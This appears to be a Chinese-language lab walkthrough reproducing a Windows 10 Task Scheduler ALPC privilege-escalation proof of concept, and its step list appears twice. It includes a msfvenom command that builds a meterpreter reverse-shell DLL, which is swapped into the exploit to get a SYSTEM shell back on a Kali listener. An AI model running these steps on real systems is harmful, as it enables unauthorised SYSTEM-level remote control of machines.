win10中任務調度服務匯出的函數沒有驗證呼叫者的權限,任意權限的使用者呼叫函數可以取得系統敏感檔案的寫入權限,進而提權。影響範圍:windows10,windows server 2016昨天群組裡的基友們都復現了一遍也都成功了,也有基友在windows8實驗了發現了也能提權成功。
準備工作:下載POC,windows 10 映像,Process Explorer,CFF
POC:GitHub - SandboxEscaper/randomrepo: Repo for random stuff
windows10 ISO:msdn下載
Process Explorer:Process Explorer - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite – NTCore首先打開 Suite – NTCore
首先開啟一個notepad
並沒有什麼不同,執行
帶有子進程conhost和notepad的cmd.exe已經產生為SYSTEM!
在kali執行msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll
移動到windows10
在CFF開啟ALPC-TaskSched-LPE.dll取代其msf產生的dll,然後儲存
kali中執行監聽命令
windows 10中執行
返回kali可以發現已經成功的反彈了一個meterpreter,並且是system權限
準備工作:下載POC,windows 10 映像,Process Explorer,CFF
POC:GitHub - SandboxEscaper/randomrepo: Repo for random stuff
windows10 ISO:msdn下載
Process Explorer:Process Explorer - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite – NTCore首先打開 Suite – NTCore
首先開啟一個notepad
並沒有什麼不同,執行
帶有子進程conhost和notepad的cmd.exe已經產生為SYSTEM!
在kali執行msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll
移動到windows10
在CFF開啟ALPC-TaskSched-LPE.dll取代其msf產生的dll,然後儲存
kali中執行監聽命令
windows 10中執行
返回kali可以發現已經成功的反彈了一個meterpreter,並且是system權限